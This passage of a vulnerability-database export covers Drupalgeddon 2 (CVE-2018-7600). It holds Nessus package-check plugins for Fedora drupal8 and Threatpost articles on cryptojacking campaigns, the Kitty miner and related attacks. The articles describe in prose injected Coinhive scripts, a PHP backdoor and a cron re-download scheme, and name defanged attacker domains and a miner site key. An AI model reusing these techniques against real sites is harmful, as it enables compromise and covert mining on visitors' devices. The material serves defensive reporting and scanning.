exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"drupal8\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:45:17", "description": "- [8.3.9](https://www.drupal.org/project/drupal/releases/8 .3.9)\n\n - [SA-CORE-2018-002 (CVE-2018-7600)](https://www.drupal.org/SA-CORE-2018-002 )\n\n - [8.3.8](https://www.drupal.org/project/drupal/releases/8 .3.8)\n\n - [SA-CORE-2018-001 (CVE-2017-6926 / CVE-2017-6927 / CVE-2017-6930 / CVE-2017-6931)](https://www.drupal.org/SA-CORE-2018-001)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-04-24T00:00:00", "type": "nessus", "title": "Fedora 26 : drupal8 (2018-922cc2fbaa) (Drupalgeddon 2)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6926", "CVE-2017-6927", "CVE-2017-6930", "CVE-2017-6931", "CVE-2018-7600"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:drupal8", "cpe:/o:fedoraproject:fedora:26"], "id": "FEDORA_2018-922CC2FBAA.NASL", "href": "https://www.tenable.com/plugins/nessus/109288", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-922cc2fbaa.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(109288);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2017-6926\",\n \"CVE-2017-6927\",\n \"CVE-2017-6930\",\n \"CVE-2017-6931\",\n \"CVE-2018-7600\"\n );\n script_xref(name:\"FEDORA\", value:\"2018-922cc2fbaa\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Fedora 26 : drupal8 (2018-922cc2fbaa) (Drupalgeddon 2)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"-\n [8.3.9](https://www.drupal.org/project/drupal/releases/8\n .3.9)\n\n - [SA-CORE-2018-002\n (CVE-2018-7600)](https://www.drupal.org/SA-CORE-2018-002\n )\n\n -\n [8.3.8](https://www.drupal.org/project/drupal/releases/8\n .3.8)\n\n - [SA-CORE-2018-001 (CVE-2017-6926 / CVE-2017-6927 /\n CVE-2017-6930 /\n CVE-2017-6931)](https://www.drupal.org/SA-CORE-2018-001)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-922cc2fbaa\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.drupal.org/SA-CORE-2018-001\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected drupal8 package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Drupal 8 SA-CORE-2018-002 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Drupal Drupalgeddon 2 Forms API Property Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/04/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:drupal8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^26([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 26\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC26\", reference:\"drupal8-8.3.9-1.fc26\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"drupal8\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2019-05-30T05:52:31", "description": "More than 115,000 sites are still vulnerable to a highly critical Drupal bug \u2013 even though a patch was released three months ago.\n\nWhen it was first revealed, the bug, which has been dubbed Drupalgeddon 2.0, impacted an estimated 1+ million sites running Drupal \u2013 including major U.S. educational institutions and government organizations around the world. According to researcher Troy Mursch, up to 115,070 sites are still vulnerable, including websites of a large television network, a mass media and entertainment conglomerate and two \u201cwell-known computer hardware manufacturers.\u201d\n\nA patch for the critical remote-code execution bug ([CVE-2018-7600](<https://groups.drupal.org/security/faq-2018-002>)), has been available since March. Drupalgeddon 2.0 \u201cpotentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised,\u201d according to MITRE\u2019s Common Vulnerabilities and Exposures bulletin.\n\nMursch said he located almost 500,000 sites using Drupal 7 (the most widely used version) using the source-code search engine PublicWWW. Any site using at least version 7.58 was not considered vulnerable, as Drupal CMS versions before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 are impacted (along with the Drupal 6 and 8.3.x and 8.4.x releases, according to Drupal).\n\n> I've shared the list of 115,070 vulnerable Drupal sites with [@USCERT_gov](<https://twitter.com/USCERT_gov?ref_src=twsrc%5Etfw>) and [@drupalsecurity](<https://twitter.com/drupalsecurity?ref_src=twsrc%5Etfw>). Due to the highly critical risk of CVE-2018-7600 being exploited, the list won't be shared publicly.\n> \n> \u2014 Bad Packets Report (@bad_packets) [June 5, 2018](<https://twitter.com/bad_packets/status/1003922275094052864?ref_src=twsrc%5Etfw>)\n\nOf those sites, more than 115,000 were vulnerable, said Mursch, but it may be more: He said he could not ascertain the versions used for 225,056 of the sites. Around 134,447 sites were not vulnerable.\n\nMursch told Threatpost he has passed along the list of impacted sites to CERTs and other government organizations for help notifying them.\n\nMeanwhile, while the researcher was scanning for vulnerable sites, he also found yet another new cryptojacking campaign targeting Drupal websites.\n\nThe campaign, which uses the domain name upgraderservices[.]cf to inject Coinhive, impacts over 250 websites, including a police department\u2019s website in Belgium and the Colorado Attorney General\u2019s office.\n\nCoinhive is a company that offers a Monero JavaScript miner to websites as a nontraditional way to monetize website content. Coinhive\u2019s JavaScript miner software is often used by hackers, who sneakily embed the code into websites and then mine Monero currency by tapping the CPU processing power of unwitting site visitors\u2019 phones, tablets and computers.\n\n> I've been monitoring the latest [#cryptojacking](<https://twitter.com/hashtag/cryptojacking?src=hash&ref_src=twsrc%5Etfw>) campaign using upgraderservices[.]cf to inject [#Coinhive](<https://twitter.com/hashtag/Coinhive?src=hash&ref_src=twsrc%5Etfw>) on vulnerable Drupal websites. The list of affected sites has been added to the spreadsheet.<https://t.co/ukZux5aSuM>\n> \n> \u2014 Bad Packets Report (@bad_packets) [June 5, 2018](<https://twitter.com/bad_packets/status/1003864551346003968?ref_src=twsrc%5Etfw>)\n\nMursch said the US-CERT has been notified of the active campaign.\n\nThe cryptomining campaign is only the most recent one to take advantage of the headache that is the Drupal glitch. Earlier in [May](<https://threatpost.com/kitty-cryptomining-malware-cashes-in-on-drupalgeddon-2-0/131668/>), researchers at Imperva Incapsula found a cryptomining malware dubbed \u201ckitty\u201d targeting servers and browsers open to Drupalgeddon 2.0. Also, a [botnet ](<https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/>)dubbed Muhstik installs cryptocurrency miners and launches DDoS attacks via compromised systems. More recently, attackers behind a [ransomware attack](<https://threatpost.com/ransomware-attack-hits-ukrainian-energy-ministry-exploiting-drupalgeddon2/131373/>) hitting the Ukrainian Energy Ministry appear to have made use of the highly critical remote-code execution bug.\n\n\u201cThis latest cryptojacking campaign is yet another example of Drupal websites being exploited on a mass scale,\u201d Mursch said. \u201cIf you\u2019re a website operator using Drupal\u2019s content management system, you need to update to the latest available version ASAP.\u201d\n", "cvss3": {}, "published": "2018-06-05T18:24:29", "type": "threatpost", "title": "Drupalgeddon 2.0 Still Haunting 115K+ Sites", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-06-05T18:24:29", "id": "THREATPOST:1A7A6E9FF0F2A41A6A83EBDE0038383C", "href": "https://threatpost.com/drupalgeddon-2-0-still-haunting-115k-sites/132518/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-09-07T08:18:49", "description": "Drupal is urging users to upgrade to the latest release that fixes two critical remote code execution bugs impacting Drupal 7 and Drupal 8. Developers have also identified three additional \u201cmoderately critical\u201d vulnerabilities.\n\n\u201cA remote attacker could exploit some of these vulnerabilities to take control of an affected system,\u201d according to a security bulletin [posted](<https://www.us-cert.gov/ncas/current-activity/2018/10/18/Drupal-Releases-Security-Updates>) by the United States Computer Emergency Readiness Team (US CERT).\n\nThe critical bugs, disclosed this week, include an injection vulnerability in the default Drupal mail backend, which uses PHP\u2019s mail function [DefaultMailSystem::mail()] in Drupal 7 and 8.\n\nOne of the critical vulnerabilities is tied to the \u201cDefaultMailSystem::mail()\u201d component in Drupal 7 and 8. According to the advisory, when using this default mail system to send emails, some variables were not being sanitized for shell arguments, according to a separate [advisory](<https://www.drupal.org/sa-core-2018-006>) released by the Drupal developer community. When untrusted input is not sanitized correctly that could lead to remote code execution.\n\nThis glitch was reported by security researcher and senior web developer [Damien Tournoud](<https://www.drupal.org/user/788032>) with Princeton University.\n\nA second remote code execution bug, reported by Nick Booher, exists in Drupal 9\u2019s Contextual Links module. In Drupal, these modules supply contextual links that allow privileged users to quickly perform tasks related to regions of the page \u2013 without having to navigating to the Admin Dashboard.\n\nHowever, the Contextual Links module doesn\u2019t sufficiently validate the requested contextual links. That means that an attacker could launch a remote code execution attack in these links.\n\nOne upside is that an attacker would need certain existing permissions: \u201cthis vulnerability is mitigated by the fact that an attacker must have a role with the permission \u2018access contextual links,'\u201d Drupal said.\n\nDrupal also acknowledged three other \u201cmoderately critical\u201d bugs in its advisory.\n\nThe first is an access bypass bug in the content moderation tool in Drupal 8. Essentially, in some conditions, content moderation fails to check a users\u2019 access to use certain transitions \u2013 potentially allowing access bypass.\n\nAnother open redirect vulnerability in Drupal 7 and 8 allows and external URL injection through URL aliases.\n\nThe path module allows users with the \u2018administer paths\u2019 to create pretty URLs for content \u2013 and that means that \u201cIn certain circumstances the user can enter a particular path that triggers an open redirect to a malicious url,\u201d Drupal said.\n\nThe issue is mitigated by the fact that the user needs the administer paths permission to exploit, Drupal said.\n\nFinally, a \u201cmoderately critical\u201d bug in Drupal\u2019s redirect process allows bad actors to trick users to visiting third party websites.\n\nAccording to Drupal, Drupal core and contributed modules frequently use a \u201cdestination\u201d query string parameter in URLs to redirect users to a new destination after completing an action on the current page.\n\n\u201cUnder certain circumstances, malicious users can use this parameter to construct a URL that will trick users into being redirected to a 3rd party website, thereby exposing the users to potential social engineering attacks,\u201d said Drupal.\n\nAll bugs were fixed, and Drupal advised users to upgrade to the most recent version of Drupal 7 or 8 core.\n\n\u201cMinor versions of Drupal 8 prior to 8.5.x are not supported and do not receive security coverage, so sites running older versions should update to the above 8.5.x release immediately. 8.5.x will receive security coverage until May 2019,\u201d the company said.\n\nDrupal has had a run through the mill when it comes to vulnerabilities this year, in particular dealing with a flaw ([CVE-2018-7600](<https://groups.drupal.org/security/faq-2018-002>)) in [March](<https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/>) impacting versions 6,7, and 8 of Drupal\u2019s CMS platform, which impacted over one million sites running Drupal.\n", "cvss3": {}, "published": "2018-10-20T17:09:46", "type": "threatpost", "title": "Critical RCE Bugs Patched in Drupal 7 and 8", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-10-20T17:09:46", "id": "THREATPOST:20E3AA69A8819545B9E113C31E8452DD", "href": "https://threatpost.com/two-critical-rce-bugs-patched-in-drupal-7-and-8/138468/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-04-25T05:50:00", "description": "**UPDATE** \u2013 Hundreds of websites running on the Drupal content management system \u2013 including those of the San Diego Zoo and the National Labor Relations Board \u2013 have been targeted by a malicious cryptomining campaign taking advantage of unpatched and recently revealed vulnerabilities.\n\nThe attacks, which have impacted over 400 government and university websites worldwide, leverage the critical remote-code execution vulnerability ([CVE-2018-7600](<https://groups.drupal.org/security/faq-2018-002>)) dubbed Drupalgeddon 2.0, said Troy Mursch, researcher with Bad Packets Report. The Drupal bug in questions has been patched for over a month now.\n\n\u201cAfter the scan completed, the full scope of this cryptojacking campaign was established,\u201d Mursch wrote in a [report posted Saturday](<https://badpackets.net/large-cryptojacking-campaign-targeting-vulnerable-drupal-websites/>). \u201cUsing the bulk scan feature of urlscan.io, it became clear these were all sites were running outdated and vulnerable versions of Drupal content management system.\u201d\n\n> This [#cryptojacking](<https://twitter.com/hashtag/cryptojacking?src=hash&ref_src=twsrc%5Etfw>) outbreak started at the zoo and quickly spread to 400+ other sites. <https://t.co/SNRtysBcsi>\n> \n> \u2014 Bad Packets Report (@bad_packets) [May 7, 2018](<https://twitter.com/bad_packets/status/993519523826290688?ref_src=twsrc%5Etfw>)\n\nAs of Tuesday evening, Mursch said he has found more websites that were targeted by the attack, including that of Lenovo, UCLA, and Office of Inspector General of the U.S. Equal Employment Opportunity Commission (a US federal government agency).\n\n> Sheet has been updated with additional sites. It's not an exhaustive list and is subject to change as this [#cryptojacking](<https://twitter.com/hashtag/cryptojacking?src=hash&ref_src=twsrc%5Etfw>) campaign is still ongoing. <https://t.co/AwO2oe1znp>\n> \n> \u2014 Bad Packets Report (@bad_packets) [May 8, 2018](<https://twitter.com/bad_packets/status/993644561476894721?ref_src=twsrc%5Etfw>)\n\nThe cryptominer in question was made by Coinhive, a company that offers a Monero JavaScript miner to websites as a nontraditional way to monetize website content. Coinhive\u2019s JavaScript miner software is often used by hackers, who secretly embed the code into websites and then mine Monero currency by tapping the CPU processing power of site visitors\u2019 phones, tablets and computers.\n\n\u201cDigging a little deeper into the cryptojacking campaign, I found in both cases that Coinhive was injected via the same method,\u201d Mursch wrote. \u201cThe malicious code was contained in the \u2018/misc/jquery.once.js?v=1.2\u2019 JavaScript library.\u201d\n\nMursch said he was notified by one of his Twitter followers soon after of additional compromised sites using a different payload \u2013 however, all the infected sites pointed to the same domain using the same Coinhive site key. Coinhive\u2019s site key is code linked to a unique cryptographic key that delegates who keeps the cryptocurrency that is being mined.\n\nThat domain used to inject the malware was vuuwd[.]com, according to Mursch. \u201cOnce the code was deobfuscated, the reference to \u2018http://vuuwd[.]com/t.js\u2019 was clearly seen. Upon visiting the URL, the ugly truth was revealed. A slightly throttled implementation of Coinhive was found.\u201d\n\nThe site key used, meanwhile, was \u201cKNqo4Celu2Z8VWMM0zfRmeJHIl75wMx6.\u201d Mursch said he confirmed the key was still active by checking in Fiddler.\n\nMursch said that the miner was only slightly throttled so that it had a reduced impact on visitors\u2019 CPUs and would be harder to detect.\n\nTypically, cryptojacking attacks are not throttled and use 100 percent of the target\u2019s CPU. As a result victims can sometimes experience overheating of their phone or computer as their device gets bogged down by an over-taxed processor.\n\nWhen trying to nail down the owner of vuuwd[.]com, Mursch came across fake data from WHOIS indicating that \u201cit belongs to \u2018X XYZ\u2019 who lives on \u2018joker joker\u2019 street in China,\u201d he explained in a Tweet. However, the email address that was used (goodluck610@foxmail.com) provided a small hint as it was associated with other registered domains.\n\n> While the clearly fake WHOIS data may seem like a dead end, the same email address (goodluck610@foxmail.com) was used to register five other domains. It's likely you'd find malicious activity tied to these as well. One of the domains references less-fake information. [pic.twitter.com/IEeqXrAKTT](<https://t.co/IEeqXrAKTT>)\n> \n> \u2014 Bad Packets Report (@bad_packets) [May 4, 2018](<https://twitter.com/bad_packets/status/992539059485528065?ref_src=twsrc%5Etfw>)\n\nThe domain name vuuwd[.]com was also used previously in Monero mining operations through mineXMR[.]com, said Mursch: \u201cWhile it\u2019s somewhat unusual they\u2019d switch from a mining pool with a 1% fee to Coinhive, who takes a 30% cut of all mining proceeds, it was the choice they made,\u201d he said.\n\nDrupalgeddon 2.0, which has been patched for over a [month](<https://threatpost.com/drupal-issues-highly-critical-patch-over-1m-sites-vulnerable/130859/>) now and impacts versions 6,7, and 8 of Drupal\u2019s CMS platform, \u201cpotentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised,\u201d according to MITRE\u2019s Common Vulnerabilities and Exposures bulletin back on March 28.\n\nSince Drupal warned in March that over one million sites running Drupal are impacted by the vulnerability, several exploits, botnets and cryptomining malware have cropped up \u2013 including a recent attack, leveraging the \u201cKitty\u201d [cryptomining](<https://threatpost.com/kitty-cryptomining-malware-cashes-in-on-drupalgeddon-2-0/131668/>) malware, which cashed in on the vulnerable Drupal websites.\n\nBeyond the Kitty malware, researchers have found a [botnet](<https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/>), dubbed Muhstik, that installs cryptocurrency miners and launches DDoS attacks via compromised systems. More recently, attackers behind a [ransomware attack](<https://threatpost.com/ransomware-attack-hits-ukrainian-energy-ministry-exploiting-drupalgeddon2/131373/>) hitting the Ukrainian Energy Ministry appear to have made use of the highly critical remote-code execution bug.\n\n\u201cWe\u2019ve seen plenty examples of Drupalgeddon 2 being exploited in the past few weeks,\u201d said Mursch in the report. \u201cThis is yet another case of miscreants compromising outdated and vulnerable Drupal installations on a large scale. If you\u2019re a website operator using Drupal\u2019s content management system, you need to update to the latest available version ASAP.\u201d\n", "cvss3": {}, "published": "2018-05-07T16:16:20", "type": "threatpost", "title": "Cryptojacking Campaign Exploits Drupal Bug, Over 400 Websites Attacked", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-05-07T16:16:20", "id": "THREATPOST:88071AD0B76A2548D98F733D0DD3FE1A", "href": "https://threatpost.com/cryptojacking-campaign-exploits-drupal-bug-over-400-websites-attacked/131733/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-04-25T05:50:00", "description": "Yet another bad actor has taken advantage of Drupal sites still vulnerable to \u201cDrupalgeddon 2.0,\u201d this time to mine cryptocurrency.\n\nThe bad script, dubbed the \u201cKitty\u201d cryptomining malware, takes advantage of the known critical remote-code execution vulnerability in Drupal ([CVE-2018-7600](<https://groups.drupal.org/security/faq-2018-002>)) to target not only servers but also browsers, according to researchers at security company Imperva Incapsula.\n\nOn servers, the attackers install a mining program \u2013 \u201ckkworker\u201d \u2013 which mines the xmrig (XMR) Monero cryptocurrency.\n\nBut the attackers are are also looking to expand their mining efforts to web app visitors using a mining script called me0w.js. They achieve this through adding the malicious JavasSript (me0w.js) to the commonly used index.php file, cashing in on the processor juice of future visitors to the infected web server site.\n\n\u201cTo win over kitty lovers\u2019 hearts, the attacker cheekily asks to leave his malware alone by printing \u2018me0w, don\u2019t delete pls i am a harmless cute little kitty, me0w,'\u201d the researchers said.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/05/03120202/kitty-31.png>)\n\nTo make it all happen, the actors behind Kitty have used an open-source mining software for browsers called \u201cwebminerpool\u201d to first write a bash script \u2013 in the form of a PHP file called kdrupal.php \u2013 on a server disc.\n\n\u201cIn doing so, the attacker reinforces their foothold in the infected server and guarantees dominance using a backdoor independent of the Drupal vulnerability,\u201d according to Imperva\u2019s [report](<https://www.incapsula.com/blog/crypto-me0wing-attacks-kitty-cashes-in-on-monero.html>).\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/05/03120017/kitty-1.png>)\n\nResearchers said that while the PHP backdoor is \u201cfairly light and simple,\u201d it has some tricks up its sleeve, including using the sha512 hash function to protect the attacker\u2019s remote authentication.\n\nOnce this backdoor has been established, a time-based job scheduler is registered to periodically re-download and execute a bash script from remote hosts every minute. This means the attackers can easily re-infect the server and quickly push updates to the infected servers under their control.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/05/03120100/kitty-2.png>)\n\nResearchers said the Monero address used in Kitty has been spotted before in April, in attacks targeting web servers running the vBulletin 4.2.X CMS.\n\nInterestingly, it appears the attacker has updated the malware version after every change in its code, according to the report.\n\n\u201cThe first generation of the \u2018Kitty malware\u2019 we discovered was version 1.5, and the latest version is 1.6,\u201d said the researchers. \u201cThis type of behavior can be an indication of an organized attacker, developing their malware like a software product, fixing bugs and releasing new features in cycles.\u201d\n\nDrupalgeddon 2.0, which has been patched for over a [month](<https://threatpost.com/drupal-issues-highly-critical-patch-over-1m-sites-vulnerable/130859/>) now and impacts versions 6,7, and 8 of Drupal\u2019s CMS platform, \u201cpotentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised,\u201d according to MITRE\u2019s Common Vulnerabilities and Exposures bulletin back on March 28.\n\nSince Drupal warned in March that over one million sites running Drupal are impacted by the vulnerability, several exploits have cropped up taking advantage of it.\n\nThat includes a [botnet](<https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/>), dubbed Muhstik, that installs cryptocurrency miners and launches DDoS attacks via compromised systems. More recently, attackers behind a [ransomware attack](<https://threatpost.com/ransomware-attack-hits-ukrainian-energy-ministry-exploiting-drupalgeddon2/131373/>) hitting the Ukrainian Energy Ministry appear to have made use of the highly critical remote-code execution bug.\n", "cvss3": {}, "published": "2018-05-03T16:57:19", "type": "threatpost", "title": "Kitty Cryptomining Malware Cashes in on Drupalgeddon 2.0", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-05-03T16:57:19", "id": "THREATPOST:3D545239C6AE58821904FBF3069CB365", "href": "https://threatpost.com/kitty-cryptomining-malware-cashes-in-on-drupalgeddon-2-0/131668/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-23T05:27:29", "description": "Drupal released a patch for a \u201chighly critical\u201d flaw in versions 6, 7 and 8 of its CMS platform that could allow an attacker to take control of an affected site simply by visiting it. Drupal also warned an unprivileged and untrusted attacker could modify or delete data hosted on affected CMS platforms.\n\nThe Drupal developers alert ([SA-CORE-2018-002](<https://groups.drupal.org/security/faq-2018-002>)) estimates over one million sites running Drupal are impacted. Affected are Drupal CMS versions before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1. Also impacted is Drupal 6 and 8.3.x and 8.4.x releases, said Drupal.\n\n\u201cThis potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised,\u201d warned the MIRTE Common Vulnerabilities and Exposures description ([CVE-2018-7600](<https://groups.drupal.org/security/faq-2018-002>)). There is no known public exploit code in the wild and no reports of the vulnerability being exploited.\n\nThe flaw is described as \u201can input validation issue where invalid query parameters could be passed into Drupal webpages,\u201d said Tim Mackey, technology evangelist at Black Duck by Synopsys.\n\nMeanwhile, several Drupal specific hosting providers, such as Pantheon, Acquia, Platform.sh and Amazee.io, are offering platform-level solutions tied to the Web Application Firewall (WAF) layer or the way they are hosting the sites. Also, at least two security oriented content delivery network services, CloudFlare and Fastly, have also rolled-out solutions to help protect customers.\n\n\u201cThe only effective mitigation we are advising is to upgrade or second best is to put a rule into a WAF,\u201d said Greg Knaddison, a Drupal security team member and product engineer and Card.com.\n\nKnaddison said it\u2019s not exactly clear what portion of Drupal sites are vulnerable because it depends on what features are enabled or not. He said, Drupal is not releasing any of the technical aspects of the vulnerability other than the patch acts as an input filter on web page requests.\n\nMackey described the vulnerability as a flaw that allows unsanitized data to enter the Drupal data space. \u201cUnder such circumstances a malicious user could cause Drupal to return data which the page authors never intended to be presented on the given page. Since the vulnerability is present within the bootstrap process, the best mitigation model is to convert the Drupal site to a pure HTML site. Administrative and maintenance pages are similarly impacted due to the issue being present in the bootstrap process,\u201d he said.\n\nKnaddison said the vulnerability has to do with the way Drupal interprets a value that begins with a hash as having a special meaning. \u201cGenerally, input filtering like this a blunt solution to the problem and not fixing the specific vulnerable code. But it gets rid of all kinds of input that might be a problem for code later in the code base,\u201d he said.\n\nKnaddison said there are a number of strong indicators that Drupal users are getting a jump on patching. He estimates \u201chundreds of thousands\u201d of sites immediately patched within the first 12 hours the patches were released. \u201cI think that with this release, we will see a very fast update rate because it just seems like everybody was really prepared to update within hours of the release,\u201d he said. Last week, [Drupal forewarned](<https://threatpost.com/drupal-forewarns-highly-critical-bug-to-be-patched-next-week/130733/>) of Wednesday\u2019s release of a highly critical patch.\n\nAccording to an analysis of Drupal sites by the firm SiteLock, only 18 percent of Drupal websites were found to be running the latest core updates. \u201cThis means that the vast majority of websites running Drupal are likely vulnerable to compromise because they are not being updated with the latest security patches,\u201d according to the company.\n", "cvss3": {}, "published": "2018-03-29T15:58:28", "type": "threatpost", "title": "Drupal Issues Highly Critical Patch: Over 1M Sites Vulnerable", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-03-29T15:58:28", "id": "THREATPOST:937A7A291D84404C800DF20ADBE20BC1", "href": "https://threatpost.com/drupal-issues-highly-critical-patch-over-1m-sites-vulnerable/130859/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-30T05:50:45", "description": "Researchers are warning of a new wave of cyberattacks targeting unpatched Drupal websites that are vulnerable to Drupalgeddon 2.0. What\u2019s unique about this latest series of attacks is that adversaries are using PowerBot malware, an IRC-controlled bot also called PerlBot or Shellbot.\n\nResearchers at IBM Security\u2019s Managed 